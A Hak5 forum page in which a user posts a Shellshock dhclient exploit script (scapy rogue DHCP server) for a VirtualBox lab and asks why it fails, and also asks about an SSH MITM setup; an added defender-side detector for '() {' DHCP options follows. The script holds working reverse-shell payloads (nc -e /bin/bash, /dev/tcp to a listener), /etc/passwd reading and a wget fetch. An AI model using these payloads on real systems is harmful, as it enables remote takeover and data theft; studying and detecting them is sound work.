Hak5 Forums

KST

Members
  • Content count: 2
  • Joined
  • Last visited

About KST
  • Rank: Newbie
  1. Hi, I have known about the Shellshock exploit. I wanted to test it and downloaded the dhclient Python file from www.exploit-db.com. I modified the Python file a little and ran it on Ubuntu 16.04, which has VirtualBox. The victim is Ubuntu 14.04 in VirtualBox. But I did not succeed. Following is my code.

        #!/usr/bin/python
        # Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC
        # Date: 2014-09-29
        # Author: @fdiskyou
        # e-mail: rui at deniable.org
        # Version: 4.1
        # Tested on: Debian, Ubuntu, Kali
        # CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187

        import struct   # used by toMAC()
        import sys      # used by sys.exit()
        from scapy.all import *

        conf.checkIPaddr = False
        fam,hw = get_if_raw_hwaddr(conf.iface)

        victim_assign_ip = "192.168.56.102"
        server_ip = "192.168.56.1"
        gateway_ip = "192.168.56.1"
        subnet_mask = "255.255.255.0"
        dns_ip = "8.8.8.8"
        spoofed_mac = "0a:00:27:00:00:00"

        payload = "() { ignored;}; echo 'moo'"
        payload_2 = "() { ignored;}; /bin/nc -e /bin/bash 192.168.56.1 4444"
        payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/192.168.56.1/4444 0>&1 &"
        payload_4 = "() { ignored;}; /bin/cat /etc/passwd"
        payload_5 = "() { ignored;}; /usr/bin/wget http://google.com"

        #rce=payload_5
        rce= "() {:;}; exec 5<>/dev/tcp/192.168.56.1/4444 && cat <&5 | while read line; do $line 2>&5 >&5 ; done"
        #rce= "(){ ignored;}; /bin/bash -c 'gnome-screensaver-command --lock'"

        def toMAC(strMac):
            # "aa:bb:cc:dd:ee:ff" -> 6 raw bytes for the BOOTP chaddr field
            cmList = strMac.split(":")
            hCMList = []
            for iter1 in cmList:
                hCMList.append(int(iter1, 16))
            hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5])
            return hMAC

        def detect_dhcp(pkt):
            # print 'Process ', ls(pkt)
            if DHCP in pkt:
                # if DHCP Discover then DHCP Offer
                if pkt[DHCP].options[0][1]==1:
                    clientMAC = pkt[Ether].src
                    print "DHCP Discover packet detected from " + clientMAC
                    sendp(
                        Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
                        IP(src=server_ip,dst="255.255.255.255")/
                        UDP(sport=67,dport=68)/
                        BOOTP(
                            op=2,
                            yiaddr=victim_assign_ip,
                            siaddr=server_ip,
                            giaddr=gateway_ip,
                            chaddr=toMAC(clientMAC),
                            xid=pkt[BOOTP].xid,
                            sname=server_ip
                        )/
                        DHCP(options=[('message-type','offer')])/
                        DHCP(options=[('subnet_mask',subnet_mask)])/
                        DHCP(options=[('name_server',dns_ip)])/
                        DHCP(options=[('lease_time',43200)])/
                        DHCP(options=[('router',gateway_ip)])/
                        DHCP(options=[('dump_path',rce)])/
                        DHCP(options=[('server_id',server_ip),('end')]),
                        iface="vboxnet0"
                    )
                    print "DHCP Offer packet sent"
                # if DHCP Request then DHCP ACK
                if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:
                    clientMAC = pkt[Ether].src
                    print "DHCP Request packet detected from " + clientMAC
                    sendp(
                        Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
                        IP(src=server_ip,dst="255.255.255.255")/
                        UDP(sport=67,dport=68)/
                        BOOTP(
                            op=2,
                            yiaddr=victim_assign_ip,
                            siaddr=server_ip,
                            giaddr=gateway_ip,
                            chaddr=toMAC(clientMAC),
                            xid=pkt[BOOTP].xid
                        )/
                        DHCP(options=[('message-type','ack')])/
                        DHCP(options=[('subnet_mask',subnet_mask)])/
                        DHCP(options=[('lease_time',43200)])/
                        DHCP(options=[('router',gateway_ip)])/
                        DHCP(options=[('name_server',dns_ip)])/
                        DHCP(options=[('dump_path',rce)])/
                        DHCP(options=[('server_id',server_ip),('end')]),
                        iface="vboxnet0"
                    )
                    print "DHCP Ack packet sent"

        def main():
            #sniff DHCP requests
            sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vboxnet0")

        if __name__ == '__main__':
            sys.exit(main())

    And I run this on my host OS:

        nc -lvp 4444

    Please help me to find the error.
  2. SSH MITM

    Hi, I tested the SSH MITM by way of this link. I have three PCs: attacker PC, SSH server and SSH client. After all instructions were done, I connected via SSH to the server from the client. But when I do this, I cannot log in with a user from the server. I can only log in with the attacker's username and password and get logged in to the attacker PC. It means that the attacker PC does not redirect to the SSH server. But I have completed all instructions described in that link. If you have time, please check my question and answer me.
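The first post above delivers a Shellshock-style string through a DHCP option so that a vulnerable dhclient hook script exports it into bash's environment. The following is an added, defender-side example (not code from the post or from exploit-db): a dependency-free parser for the DHCP options field that flags string-valued options beginning with the bash function-export prefix "() {", which is the signature a DHCP-side IDS rule or a packet-capture triage script would look for. The option-code names and the two sample option blobs are constructed for this example; the fixed 236-byte BOOTP header and the 0x63825363 magic cookie are as defined in RFC 2131.

```python
"""Flag Shellshock-style function-definition prefixes in DHCP option strings.

Added example, not part of the forum post. Parses the raw DHCP options field
(TLV list after the magic cookie) and reports any option whose value starts
with "() {", the prefix that pre-patch bash treated as an exported function
definition when the value reached it via an environment variable.
"""
import re
import struct

# Optional leading whitespace, "()", optional whitespace, "{" at the very start.
SHELLSHOCK_RE = re.compile(rb"^\s*\(\)\s*\{")

# Constructed subset of DHCP options whose values dhclient hands to its hook
# scripts as environment variables (e.g. new_host_name); option 14 is the one
# scapy calls "dump_path".
STRING_OPTIONS = {
    12: "host_name",
    14: "merit_dump",
    15: "domain_name",
    17: "root_path",
    40: "nis_domain",
    66: "tftp_server_name",
    67: "bootfile_name",
}

MAGIC_COOKIE = b"\x63\x82\x53\x63"   # RFC 2131 DHCP options cookie
BOOTP_FIXED_LEN = 236                # size of the fixed BOOTP header


def options_from_bootp(udp_payload):
    """Return the options field of a raw BOOTP/DHCP UDP payload."""
    if len(udp_payload) < BOOTP_FIXED_LEN + 4:
        raise ValueError("payload too short for a DHCP message")
    if udp_payload[BOOTP_FIXED_LEN:BOOTP_FIXED_LEN + 4] != MAGIC_COOKIE:
        raise ValueError("missing DHCP magic cookie")
    return udp_payload[BOOTP_FIXED_LEN + 4:]


def parse_dhcp_options(options):
    """Parse the options TLV list into [(code, value_bytes)].

    PAD (0) has no length byte, END (255) terminates the list, and a
    truncated option raises instead of silently returning partial data.
    """
    result = []
    i = 0
    while i < len(options):
        code = options[i]
        if code == 0:          # PAD
            i += 1
            continue
        if code == 255:        # END
            break
        if i + 1 >= len(options):
            raise ValueError("truncated option header at offset %d" % i)
        length = options[i + 1]
        value = options[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option %d" % code)
        result.append((code, value))
        i += 2 + length
    return result


def find_shellshock_options(options):
    """Return [(code, name, value)] for every option carrying the "() {" prefix."""
    hits = []
    for code, value in parse_dhcp_options(options):
        if SHELLSHOCK_RE.match(value):
            hits.append((code, STRING_OPTIONS.get(code, "option-%d" % code), value))
    return hits


def build_options(pairs):
    """Encode [(code, value_bytes)] as a DHCP options field terminated by END."""
    out = bytearray()
    for code, value in pairs:
        out += struct.pack("!BB", code, len(value)) + value
    out += b"\xff"
    return bytes(out)


# Constructed samples: a benign offer and one carrying a function-definition
# prefix in the merit-dump (scapy "dump_path") option.
BENIGN = build_options([(53, b"\x02"), (1, b"\xff\xff\xff\x00"), (12, b"lab-vm")])
MALICIOUS = build_options([(53, b"\x02"), (14, b"() { :;}; echo moo")])

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, find_shellshock_options(blob))
```

On a bash patched for CVE-2014-6271 and CVE-2014-7169 the prefix in an arbitrary environment variable is no longer parsed as a function, so the first mitigation is simply keeping bash current; the detector is still worth running over DHCP traffic on a lab or guest network, because a rogue DHCP server sending this pattern is a strong indicator of an attack in progress regardless of whether the client is vulnerable.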